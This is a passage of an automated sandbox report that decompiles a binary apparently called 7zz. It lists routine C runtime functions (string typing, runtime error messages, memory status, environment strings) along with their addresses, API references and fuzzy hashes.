                                                                                                                                    0x0041451b
                                                                                                                                    0x0041451b
                                                                                                                                    0x0041451d
                                                                                                                                    0x00414520
                                                                                                                                    0x00414522
                                                                                                                                    0x00414527
                                                                                                                                    0x0041452d
                                                                                                                                    0x0041452d
                                                                                                                                    0x0041452d
                                                                                                                                    0x00000000
                                                                                                                                    0x00414520
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414453
                                                                                                                                    0x00414453
                                                                                                                                    0x00414456
                                                                                                                                    0x00414463
                                                                                                                                    0x00414466
                                                                                                                                    0x00414469
                                                                                                                                    0x0041446b
                                                                                                                                    0x0041446b
                                                                                                                                    0x0041446d
                                                                                                                                    0x00414475
                                                                                                                                    0x0041448a
                                                                                                                                    0x0041448a
                                                                                                                                    0x00414477
                                                                                                                                    0x00414479
                                                                                                                                    0x0041447c
                                                                                                                                    0x0041447f
                                                                                                                                    0x00414482
                                                                                                                                    0x00414482
                                                                                                                                    0x00414490
                                                                                                                                    0x00414492
                                                                                                                                    0x00414497
                                                                                                                                    0x0041449c
                                                                                                                                    0x0041449f
                                                                                                                                    0x0041449f
                                                                                                                                    0x004144a2
                                                                                                                                    0x004144a2
                                                                                                                                    0x004144ab
                                                                                                                                    0x004144b2
                                                                                                                                    0x004144ba
                                                                                                                                    0x004144c2
                                                                                                                                    0x004144c2
                                                                                                                                    0x004144c7
                                                                                                                                    0x004144cd
                                                                                                                                    0x004144f1
                                                                                                                                    0x004144cf
                                                                                                                                    0x004144de
                                                                                                                                    0x004144e5
                                                                                                                                    0x004144e8
                                                                                                                                    0x004144e8
                                                                                                                                    0x004144f6
                                                                                                                                    0x004144fa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414500
                                                                                                                                    0x00414503
                                                                                                                                    0x0041450c
                                                                                                                                    0x0041450f
                                                                                                                                    0x00000000
                                                                                                                                    0x0041450f
                                                                                                                                    0x0041438e
                                                                                                                                    0x00414390
                                                                                                                                    0x00414398
                                                                                                                                    0x00414399
                                                                                                                                    0x0041439f
                                                                                                                                    0x004143a2
                                                                                                                                    0x004143a9
                                                                                                                                    0x004143ac
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004143ae
                                                                                                                                    0x004143b1
                                                                                                                                    0x004143ba
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004143bc
                                                                                                                                    0x00414419
                                                                                                                                    0x0041441c
                                                                                                                                    0x00414420
                                                                                                                                    0x00414422
                                                                                                                                    0x00414426
                                                                                                                                    0x00414426
                                                                                                                                    0x0041442b
                                                                                                                                    0x00000000
                                                                                                                                    0x0041442b
                                                                                                                                    0x004142e3
                                                                                                                                    0x004142e3
                                                                                                                                    0x004142eb
                                                                                                                                    0x004142ee
                                                                                                                                    0x004142f2
                                                                                                                                    0x004142f4
                                                                                                                                    0x004142fd
                                                                                                                                    0x004142fe
                                                                                                                                    0x00414301
                                                                                                                                    0x00414308
                                                                                                                                    0x0041430b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414313
                                                                                                                                    0x004143d8
                                                                                                                                    0x004143db
                                                                                                                                    0x004143df
                                                                                                                                    0x00414406
                                                                                                                                    0x00414406
                                                                                                                                    0x0041440a
                                                                                                                                    0x0041440a
                                                                                                                                    0x0041440f
                                                                                                                                    0x00000000
                                                                                                                                    0x0041440f
                                                                                                                                    0x00414319
                                                                                                                                    0x0041431c
                                                                                                                                    0x0041431f
                                                                                                                                    0x0041435a
                                                                                                                                    0x0041435a
                                                                                                                                    0x0041435d
                                                                                                                                    0x00414369
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041436b
                                                                                                                                    0x00000000
                                                                                                                                    0x0041436b
                                                                                                                                    0x00414324
                                                                                                                                    0x00414327
                                                                                                                                    0x0041432a
                                                                                                                                    0x0041432c
                                                                                                                                    0x0041432e
                                                                                                                                    0x0041432f
                                                                                                                                    0x00414336
                                                                                                                                    0x00414339
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414345
                                                                                                                                    0x004143fd
                                                                                                                                    0x00414400
                                                                                                                                    0x00414404
                                                                                                                                    0x00000000
                                                                                                                                    0x00414404
                                                                                                                                    0x0041434b
                                                                                                                                    0x0041434e
                                                                                                                                    0x00414358
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00414358
                                                                                                                                    0x004143e3
                                                                                                                                    0x004143e6
                                                                                                                                    0x004143ea
                                                                                                                                    0x004143ec
                                                                                                                                    0x004143f0
                                                                                                                                    0x004143f0
                                                                                                                                    0x004143f5
                                                                                                                                    0x00000000
                                                                                                                                    0x004143f5
                                                                                                                                    0x004143be
                                                                                                                                    0x004143c1
                                                                                                                                    0x004143c5
                                                                                                                                    0x004143c7
                                                                                                                                    0x004143cb
                                                                                                                                    0x004143cb
                                                                                                                                    0x004143d0
                                                                                                                                    0x004143d0

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041426E
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0041481F
                                                                                                                                      • Part of subcall function 00413E35: __EH_prolog.LIBCMT ref: 00413E3A
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 004145AC
                                                                                                                                      • Part of subcall function 00413EF3: __EH_prolog.LIBCMT ref: 00413EF8
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00414716
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0041473A
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00414765
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 004147E9
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0041483B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalDeleteSection$H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 267298877-0
                                                                                                                                    • Opcode ID: d4d776e8c1b9d0ca8148744633a2427739796b36842d32978f84ccf237524d62
                                                                                                                                    • Instruction ID: c24d3815df71a14f5bbf7c8d066a825158e8e708a592f674f2395a742420ece0
                                                                                                                                    • Opcode Fuzzy Hash: d4d776e8c1b9d0ca8148744633a2427739796b36842d32978f84ccf237524d62
                                                                                                                                    • Instruction Fuzzy Hash: 8C125A31E002199FDF14DF94C981AEEB7B5BF88314F14416AE529AB380D7789A81CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00472375 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E00472375(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, char _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x47cd40);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x4938a4; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x493880; // 0x0
								_a20 = _t44;
							}
							_t13 =  &_a28; // 0x496224
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~( *_t13) & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E0046CC80(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E0046CCB0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x493870; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x47cd24, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x47cd20, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x4938a4 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















                                                                                                                                    0x00472378
                                                                                                                                    0x0047237a
                                                                                                                                    0x0047237f
                                                                                                                                    0x0047238a
                                                                                                                                    0x0047238b
                                                                                                                                    0x00472392
                                                                                                                                    0x00472398
                                                                                                                                    0x0047239b
                                                                                                                                    0x004723a4
                                                                                                                                    0x004723e4
                                                                                                                                    0x004723e7
                                                                                                                                    0x00472410
                                                                                                                                    0x00000000
                                                                                                                                    0x00472416
                                                                                                                                    0x00472419
                                                                                                                                    0x0047241b
                                                                                                                                    0x00472420
                                                                                                                                    0x00472420
                                                                                                                                    0x0047242b
                                                                                                                                    0x00472430
                                                                                                                                    0x0047243a
                                                                                                                                    0x00472440
                                                                                                                                    0x00472445
                                                                                                                                    0x00000000
                                                                                                                                    0x00472447
                                                                                                                                    0x00472447
                                                                                                                                    0x00472454
                                                                                                                                    0x00472459
                                                                                                                                    0x0047245c
                                                                                                                                    0x0047245e
                                                                                                                                    0x00472464
                                                                                                                                    0x00472479
                                                                                                                                    0x0047247f
                                                                                                                                    0x00000000
                                                                                                                                    0x00472481
                                                                                                                                    0x00472490
                                                                                                                                    0x00472498
                                                                                                                                    0x00000000
                                                                                                                                    0x0047249a
                                                                                                                                    0x004724a2
                                                                                                                                    0x004724a2
                                                                                                                                    0x00472498
                                                                                                                                    0x0047247f
                                                                                                                                    0x00472445
                                                                                                                                    0x004723e9
                                                                                                                                    0x004723e9
                                                                                                                                    0x004723ee
                                                                                                                                    0x004723f0
                                                                                                                                    0x004723f0
                                                                                                                                    0x00472402
                                                                                                                                    0x00472402
                                                                                                                                    0x004723a6
                                                                                                                                    0x004723a9
                                                                                                                                    0x004723ac
                                                                                                                                    0x004723bc
                                                                                                                                    0x004723d6
                                                                                                                                    0x004724aa
                                                                                                                                    0x004724aa
                                                                                                                                    0x004723dc
                                                                                                                                    0x004723de
                                                                                                                                    0x00000000
                                                                                                                                    0x004723de
                                                                                                                                    0x004723be
                                                                                                                                    0x004723be
                                                                                                                                    0x004723df
                                                                                                                                    0x004723df
                                                                                                                                    0x00000000
                                                                                                                                    0x004723df
                                                                                                                                    0x004723bc
                                                                                                                                    0x004724b2
                                                                                                                                    0x004724bd

                                                                                                                                    APIs
                                                                                                                                    • GetStringTypeW.KERNEL32(00000001,0047CD24,00000001,?,766870F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 004723B4
                                                                                                                                    • GetStringTypeA.KERNEL32(00000000,00000001,0047CD20,00000001,?,?,00471FC7,?,?,?,00000000,00000001), ref: 004723CE
                                                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,00471FC7,766870F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 00472402
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,$bI,?,?,00000000,00000000,766870F0,00496224,?,?,00471FC7,?,?,?,00000000,00000001), ref: 0047243A
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00471FC7,?), ref: 00472490
                                                                                                                                    • GetStringTypeW.KERNEL32(?,?,00000000,00471FC7,?,?,?,?,?,?,00471FC7,?), ref: 004724A2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: StringType$ByteCharMultiWide
                                                                                                                                    • String ID: $bI
                                                                                                                                    • API String ID: 3852931651-2563688255
                                                                                                                                    • Opcode ID: 5faa2e72cf23a552d0f70167b23892f61f4cda34b29eb4cb4140b725662a4e30
                                                                                                                                    • Instruction ID: a5c6d82e9c342f5f8861e27a946ad25536d4888bca3c47b44a025a795350f61f
                                                                                                                                    • Opcode Fuzzy Hash: 5faa2e72cf23a552d0f70167b23892f61f4cda34b29eb4cb4140b725662a4e30
                                                                                                                                    • Instruction Fuzzy Hash: 57419E72600259BFCF209FA4DD85EEF3FB8FB09350F10882AF919D2250D37999508B99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00470C41 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00470C41(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x490378;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x490408) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x490378; // 0x5c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x493678; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x48e044 == 1) {
						_t16 = _t54 + 0x49037c; // 0x47cc5c
						_t56 = _t16;
						_t19 = L0046B400( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00471740( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(L0046B400( &_v424) + 1 > 0x3c) {
								_t49 = L0046B400( &_v424) +  &_v424 - 0x3b;
								E00471CB0(L0046B400( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00471740( &_v164, "Runtime Error!\n\nProgram: ");
							E00471750( &_v164, _t49);
							E00471750( &_v164, "\n\n");
							_t12 = _t54 + 0x49037c; // 0x47cc5c
							E00471750( &_v164,  *_t12);
							_t17 = E00471C24( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













                                                                                                                                    0x00470c41
                                                                                                                                    0x00470c4a
                                                                                                                                    0x00470c4d
                                                                                                                                    0x00470c4f
                                                                                                                                    0x00470c54
                                                                                                                                    0x00470c58
                                                                                                                                    0x00470c5b
                                                                                                                                    0x00470c61
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00470c61
                                                                                                                                    0x00470c66
                                                                                                                                    0x00470c69
                                                                                                                                    0x00470c6f
                                                                                                                                    0x00470c75
                                                                                                                                    0x00470c7d
                                                                                                                                    0x00470d6e
                                                                                                                                    0x00470d6e
                                                                                                                                    0x00470d79
                                                                                                                                    0x00470d8b
                                                                                                                                    0x00470c94
                                                                                                                                    0x00470c9a
                                                                                                                                    0x00470cb6
                                                                                                                                    0x00470cc4
                                                                                                                                    0x00470cca
                                                                                                                                    0x00470cd1
                                                                                                                                    0x00470cd3
                                                                                                                                    0x00470ce3
                                                                                                                                    0x00470cfe
                                                                                                                                    0x00470d06
                                                                                                                                    0x00470d0b
                                                                                                                                    0x00470d0b
                                                                                                                                    0x00470d1a
                                                                                                                                    0x00470d27
                                                                                                                                    0x00470d38
                                                                                                                                    0x00470d3d
                                                                                                                                    0x00470d4a
                                                                                                                                    0x00470d60
                                                                                                                                    0x00470d68
                                                                                                                                    0x00470c9a
                                                                                                                                    0x00470c7d
                                                                                                                                    0x00470d93

                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00470CAE
                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,0047CC5C,00000000,00000000,00000000,?), ref: 00470D84
                                                                                                                                    • WriteFile.KERNEL32(00000000), ref: 00470D8B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                    • API String ID: 3784150691-4022980321
                                                                                                                                    • Opcode ID: 3f1414031e306f802f3caa4c7c29117252c4b502bfb9922d2e50e8356c28ed3a
                                                                                                                                    • Instruction ID: 26f8d94228b957b8f636da331ac734a73308fccb95c236921b77b6dd9be393b7
                                                                                                                                    • Opcode Fuzzy Hash: 3f1414031e306f802f3caa4c7c29117252c4b502bfb9922d2e50e8356c28ed3a
                                                                                                                                    • Instruction Fuzzy Hash: F1313932601208AFEF35EBA4CD85FDE336CEB45304F10856BF54CE6251E678A9848B5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040C609 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                    			E0040C609() {
				struct _MEMORYSTATUS _v36;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v100;
				_Unknown_base(*)()* _t15;
				intOrPtr _t17;
				intOrPtr _t19;
				void* _t27;

				_v100 = 0x40;
				_t15 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GlobalMemoryStatusEx");
				if(_t15 == 0) {
					L7:
					_v36.dwLength = 0x20;
					GlobalMemoryStatus( &_v36);
					_t17 = _v36.dwTotalVirtual;
					if(_t17 >= _v36.dwTotalPhys) {
						_t17 = _v36.dwTotalPhys;
					}
					return _t17;
				} else {
					_push( &_v100);
					if( *_t15() == 0) {
						goto L7;
					} else {
						_t19 = _v92;
						_t27 = _v56 - _v88;
						if(_t27 > 0 || _t27 >= 0 && _v60 >= _t19) {
							return _t19;
						} else {
							return _v60;
						}
					}
				}
			}













                                                                                                                                    0x0040c619
                                                                                                                                    0x0040c627
                                                                                                                                    0x0040c62f
                                                                                                                                    0x0040c657
                                                                                                                                    0x0040c65a
                                                                                                                                    0x0040c662
                                                                                                                                    0x0040c668
                                                                                                                                    0x0040c66e
                                                                                                                                    0x0040c670
                                                                                                                                    0x0040c670
                                                                                                                                    0x0040c676
                                                                                                                                    0x0040c631
                                                                                                                                    0x0040c634
                                                                                                                                    0x0040c639
                                                                                                                                    0x00000000
                                                                                                                                    0x0040c63b
                                                                                                                                    0x0040c63e
                                                                                                                                    0x0040c641
                                                                                                                                    0x0040c644
                                                                                                                                    0x0040c656
                                                                                                                                    0x0040c64d
                                                                                                                                    0x0040c651
                                                                                                                                    0x0040c651
                                                                                                                                    0x0040c644
                                                                                                                                    0x0040c639

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040C620
                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040C627
                                                                                                                                    • GlobalMemoryStatus.KERNEL32 ref: 0040C662
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                    • API String ID: 2450578220-802862622
                                                                                                                                    • Opcode ID: e084be034f3929a9efab15a420d4320ad8e287069fa46d9bd79244de0d77a124
                                                                                                                                    • Instruction ID: f023bf0e3df83ca1e7ee498ce2c1c416e3a88b1c0401ce8498900abd94d01139
                                                                                                                                    • Opcode Fuzzy Hash: e084be034f3929a9efab15a420d4320ad8e287069fa46d9bd79244de0d77a124
                                                                                                                                    • Instruction Fuzzy Hash: 7D014B70A0020DDBDF10EBE4D989A9EB7B5FB94348F244A25E405B7294D779E840CB9D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00470AD6 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00470AD6() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x493840; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = L0046BFC5(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E0046C5C0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = L0046BFC5(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E0046C0FF(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x493840 = 2;
					goto L18;
				}
				 *0x493840 = 1;
				goto L6;
			}















                                                                                                                                    0x00470ad8
                                                                                                                                    0x00470ae7
                                                                                                                                    0x00470ae9
                                                                                                                                    0x00470aeb
                                                                                                                                    0x00470aef
                                                                                                                                    0x00470b27
                                                                                                                                    0x00470bb1
                                                                                                                                    0x00470bff
                                                                                                                                    0x00000000
                                                                                                                                    0x00470bff
                                                                                                                                    0x00470bb3
                                                                                                                                    0x00470bb5
                                                                                                                                    0x00470bc3
                                                                                                                                    0x00470bc5
                                                                                                                                    0x00470bc7
                                                                                                                                    0x00470bd3
                                                                                                                                    0x00470bd6
                                                                                                                                    0x00470bde
                                                                                                                                    0x00470be3
                                                                                                                                    0x00470bec
                                                                                                                                    0x00470be5
                                                                                                                                    0x00470be5
                                                                                                                                    0x00470be5
                                                                                                                                    0x00470bf5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00470bc9
                                                                                                                                    0x00470bc9
                                                                                                                                    0x00470bc9
                                                                                                                                    0x00470bc9
                                                                                                                                    0x00470bca
                                                                                                                                    0x00470bce
                                                                                                                                    0x00470bcf
                                                                                                                                    0x00000000
                                                                                                                                    0x00470bc9
                                                                                                                                    0x00470bbd
                                                                                                                                    0x00470bc1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00470bc1
                                                                                                                                    0x00470b2d
                                                                                                                                    0x00470b2f
                                                                                                                                    0x00470b3d
                                                                                                                                    0x00470b40
                                                                                                                                    0x00470b42
                                                                                                                                    0x00470b52
                                                                                                                                    0x00470b5e
                                                                                                                                    0x00470b65
                                                                                                                                    0x00470b6b
                                                                                                                                    0x00470b6f
                                                                                                                                    0x00470b72
